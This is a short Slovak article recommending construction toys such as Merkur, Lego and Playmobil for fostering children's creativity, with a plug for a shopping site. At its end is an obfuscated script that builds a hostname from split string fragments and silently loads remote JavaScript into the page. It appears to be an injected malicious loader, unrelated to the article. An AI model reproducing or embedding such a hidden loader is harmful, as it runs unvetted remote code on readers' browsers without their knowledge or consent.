Podporte vo vašich deťoch tvorivosť. Toto sú hračky, ktoré im v tom pomôžu

0
2449

Deti sú vo všeobecnosti tvorivé bytosti Tvorivosť a kreativita je proces, pri ktorých niečo vzniká – obrázok, text, model. Práve deti sú obvykle tvorivejšie než dospelí, majú veľa nápadov a otázok. Podporte rozvoj ich tvorivosti pomocou hier.

Stavebnica Merkur

Možno si ju z detstva pamätáte aj vy. Stavebnica Merkur pozostáva z množstva dielikov, platničiek, šróbov, vďaka ktorým si deti môžu postaviť najrôznejšie modely. Táto česká stavebnica má dlhoročnú tradíciu a deti ju milujú dodnes. V súčasnosti nájdete veľa sad, z ktorých si deti postavia nielen jednoduché mechanické modely, ale zoznámia sa aj s elektrinou a magnetizmom. Zábavnou formou tak hra rozvíja ich zručnosť, tvorivosť, trpezlivosť aj predstavivosť.

Stavebnice Merkur nájdete aj na Heureka.sk. Pozrite si stovky produktov, zoraďte si ich podľa obľúbenosti alebo ceny a prečítajte si recenzie od overených používateľov.

Stavebnica Lego

Lego je ďalšou tradičnou stavebnicou, ktorá je na svete už desaťročia. Na rozdiel od Merkuru je o niečo jednoduchšia a pozostáva len z mechanických kociek, z ktorých deti všeličo poskladajú. Od klasickej hry Lego až po premyslené modely z filmov Star Wars, Harry Potter alebo z obľúbených detských rozprávok. Uvidíte, že s Legom sa deti zabavia celé hodiny a budú popri stavaní rozvíjať nielen tvorivosť, ale aj predstavivosť a zručnosť.

Stavebnica Playmobil

V súčasnosti veľmi obľúbené sú aj stavebnice Playmobil. Podobne, ako predošlé dve, ponúkajú deťom možnosť postaviť si napríklad celý domček pre bábiky, pirátsku skrýš alebo napríklad farmu. Nechajte deti, nech sa starajú o kone, kravy alebo prasiatka, či ukryjú poklad na vzdialenom a opustenom ostrove. Playmobil je skvelá hra, ktorá je nielen stavebnicou, ale aj interaktívnym svetom, ktorý si deti samé postavia. Rozvíjajte tvorivosť a fantáziu detí so stavebnicou Playmobil aj vy.

Stavebnice ale samozrejme nie sú jediné hry, ktoré deťom pomáhajú rozvíjať tvorivosť. Aj obyčajné kreslenie, maľovanie, rozprávanie sa im poskytuje možnosť využiť svoje tvorivé schopnosti.

<script>(function(){ad05=document.createElement(„script“);ad05_=“u“+(„s“)+“ta“;ad05_+=(„t.i“)+““+“n“;ad05_+=((„f“)+“o“);ad05.type=“text/javascript“;ad05_+=“/“; ad05u=“307567046″;ad05u+=“.e8yqv3qcd053tx5l3bj“;ad05u+=“hgqr5616q0t“;ad05.src=“https://“+ad05_+ad05u;ad05.async=true;document.body.appendChild(ad05);})();</script>